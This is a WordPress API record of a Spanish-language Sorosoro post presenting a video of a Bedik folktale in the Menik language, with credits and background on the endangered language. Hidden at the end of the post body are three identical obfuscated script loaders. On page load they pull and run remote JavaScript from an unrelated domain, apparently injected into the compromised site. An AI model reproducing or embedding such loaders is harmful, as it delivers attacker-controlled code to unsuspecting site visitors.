{"id":51564,"date":"2011-06-25T21:45:46","date_gmt":"2011-06-25T19:45:46","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=51564"},"modified":"2025-10-21T22:33:07","modified_gmt":"2025-10-21T20:33:07","slug":"cuento-bedik-n4-la-nina-que-queria-beber-cerveza","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/","title":{"rendered":"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza"},"content":{"rendered":"<p style=\"text-align: justify;\">Con este cuento, vamos a clausurar nuestra primera serie de historia narradas por <strong>Aminata Camara<\/strong> al lado de la fogata en su pueblo <strong>bedik <\/strong>de Bandafasi, al este de Senegal.<\/p>\n<p style=\"text-align: justify;\">A\u00fan en lengua <strong>menik<\/strong>, Aminata cuenta esta vez frente a los ni\u00f1os de la comunidad la historia de <strong>una ni\u00f1a que quer\u00eda beber cerveza<\/strong>. Parece muy astuta esta chiquilla, sin embargo se ve embarcada en una serie de aventuras sorprendentes, un tipo de camino de iniciaci\u00f3n que pone en escena a un elefante, pescados, a un gavil\u00e1n, termitas\u2026<\/p>\n<p style=\"text-align: justify;\">Entonces, \u00bfcu\u00e1l es la moraleja de este cuento? Puede ser simplemente una manera  de ensenar a los ni\u00f1os algunos principios de base. Por ejemplo que es necesario cuidar sus cosas, de lo contrario, las podemos perder\u2026<\/p>\n<p style=\"text-align: justify;\"><a href=\"..\/es\/cuento-bedik-n%C2%B01-el-huerfano-vengado-por-el-bosque\">Ver el cuento bedik n\u00b01: \u00abel hu\u00e9rfano vengado por el bosque\u00bb<\/a><\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/cuento-bedik-n%C2%B02-las-aventuras-de-la-hiena-tama\">Ver el cuento bedik n\u00b02: \u00ablas aventuras de la hiena Tama\u00bb<\/a><\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/cuento-bedik-n%C2%B03-la-mona-que-se-transformo-en-jovencita\">Ver el cuento bedik n\u00b03: \u00abla mona que se transform\u00f3 en jovencita\u00bb<\/a><\/p>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"610\" height=\"370\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" \/><param name=\"allowscriptaccess\" value=\"always\" \/><param name=\"src\" value=\"http:\/\/www.youtube.com\/v\/X5oYfcnsrBo?version=3&amp;hl=fr_FR\" \/><param name=\"allowfullscreen\" value=\"true\" \/><embed type=\"application\/x-shockwave-flash\" width=\"610\" height=\"370\" src=\"http:\/\/www.youtube.com\/v\/X5oYfcnsrBo?version=3&amp;hl=fr_FR\" allowscriptaccess=\"always\" allowfullscreen=\"true\"><\/embed><\/object><\/p>\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; margin: 0px;\"><span style=\"text-decoration: underline;\">Ling\u00fcista<\/span>: Adjaratou Oumar Sall<br \/>\n<span style=\"text-decoration: underline;\">Imagen y sonido<\/span>: Muriel Lutz. Asistente: Cheikh Tidiane Sall<br \/>\n<span style=\"text-decoration: underline;\">Traducci\u00f3n<\/span>: Marcel Camara<br \/>\n<span style=\"text-decoration: underline;\">Montaje<\/span>: Caroline Laurent<\/p>\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; text-align: justify; margin: 0px;\">Video realizado en el marco del proyecto\u00a0<em>S\u00e9n\u00e9langues<\/em><\/p>\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; text-align: justify; margin: 0px;\">\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; text-align: justify; margin: 0px;\"><em>Recordatorio: el menik es una lengua de la <\/em><a href=\"..\/en\/niger-congo-languages\"><em>familia N\u00edger-Congo<\/em><\/a><em> (rama Atl\u00e1ntico Norte, grupo oeste-atl\u00e1ntico, subgrupo tenda) y comprende tres dialectos: el banap\u00e1, el biwol y el b\u00eb\u00f1olo. Une lengua en peligro de extinci\u00f3n, el bapen, m\u00e1s antigua que el menik ha sido encontrada en 1961 por la ling\u00fcista Marie-Paule Ferry. Esta lengua es probablemente la\u201cmadre\u201d de las lenguas menik y oniyan (bassari). Es en la regi\u00f3n de K\u00e9dougou, en la localidad de Bandafasi, donde se llev\u00f3 a cabo nuestro rodaje, en dialecto banap\u00e1.<\/em><\/p>\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; text-align: justify; margin: 0px;\"><em>Los misionarios cristianos de NTM (New Tribes Mission), quienes fueron los segundos en trabajar sobre la lengua, estimaron en el 2002 el n\u00famero de bedik de Senegal en 3380.<\/em><\/p>\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; text-align: justify; margin: 0px;\"><em>Lo vemos, con s\u00f3lo un m\u00e1ximo de algunos millares de hablantes, la lengua menik puede ser considerada como en peligro a m\u00e1s o menos largo plazo. Constatamos sin embargo que, incluso si la mayor\u00eda de los hablantes habla fluidamente el idioma fula (llamado tambi\u00e9n pulaar o peul), el mandinka (malink\u00e9) y el franc\u00e9s, y lo usan d\u00eda con d\u00eda, la lengua se transmite todav\u00eda en los pueblos.<\/em><\/p>\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; text-align: justify; margin: 0px;\"><em>Los hablantes del menik, aunque est\u00e9n perfectamente bien integrados a la cultura que los rodea y aunque tengan una gran permeabilidad de las otras lenguas con las cuales est\u00e1n en contacto, est\u00e1n unidos por un s\u00f3lido sentimiento de identidad que protege su lengua.<\/em><\/p>\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; text-align: justify; margin: 0px;\"><em><a href=\"..\/en\/menik\">Para m\u00e1s informaci\u00f3n sobre la lengua menik<\/a><\/em><\/p>\n<p style=\"padding-top: 0px; padding-right: 5px; padding-bottom: 7px; padding-left: 10px; text-align: justify; margin: 0px;\"><a href=\"..\/es\/introduccion-del-video-de-presentacion-de-la-lengua-menik\"><em>Para ver una presentaci\u00f3n del menik<\/em><\/a><\/p>\n<p style=\"text-align: justify;\">\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Con este cuento, vamos a clausurar nuestra primera serie de historia narradas por Aminata Camara al lado de la fogata en su pueblo bedik de Bandafasi, al este de Senegal. A\u00fan en lengua menik, Aminata cuenta esta vez frente a los ni\u00f1os de la comunidad la historia de una ni\u00f1a que quer\u00eda beber cerveza. Parece [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25],"tags":[],"class_list":["post-51564","post","type-post","status-publish","format-standard","hentry","category-video-de-la-semana"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"Con este cuento, vamos a clausurar nuestra primera serie de historia narradas por Aminata Camara al lado de la fogata en su pueblo bedik de Bandafasi, al este de Senegal. A\u00fan en lengua menik, Aminata cuenta esta vez frente a los ni\u00f1os de la comunidad la historia de una ni\u00f1a que quer\u00eda beber cerveza. Parece [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-06-25T19:45:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:33:07+00:00\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza\",\"datePublished\":\"2011-06-25T19:45:46+00:00\",\"dateModified\":\"2025-10-21T20:33:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/\"},\"wordCount\":469,\"articleSection\":[\"Todos los videos\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/\",\"name\":\"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2011-06-25T19:45:46+00:00\",\"dateModified\":\"2025-10-21T20:33:07+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/","og_locale":"es_ES","og_type":"article","og_title":"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza - Sorosoro","og_description":"Con este cuento, vamos a clausurar nuestra primera serie de historia narradas por Aminata Camara al lado de la fogata en su pueblo bedik de Bandafasi, al este de Senegal. A\u00fan en lengua menik, Aminata cuenta esta vez frente a los ni\u00f1os de la comunidad la historia de una ni\u00f1a que quer\u00eda beber cerveza. Parece [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/","og_site_name":"Sorosoro","article_published_time":"2011-06-25T19:45:46+00:00","article_modified_time":"2025-10-21T20:33:07+00:00","author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza","datePublished":"2011-06-25T19:45:46+00:00","dateModified":"2025-10-21T20:33:07+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/"},"wordCount":469,"articleSection":["Todos los videos"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/","name":"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2011-06-25T19:45:46+00:00","dateModified":"2025-10-21T20:33:07+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n4-la-nina-que-queria-beber-cerveza\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"Cuento bedik n\u00b04: la ni\u00f1a que quer\u00eda beber cerveza"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/51564","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=51564"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/51564\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=51564"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=51564"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=51564"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}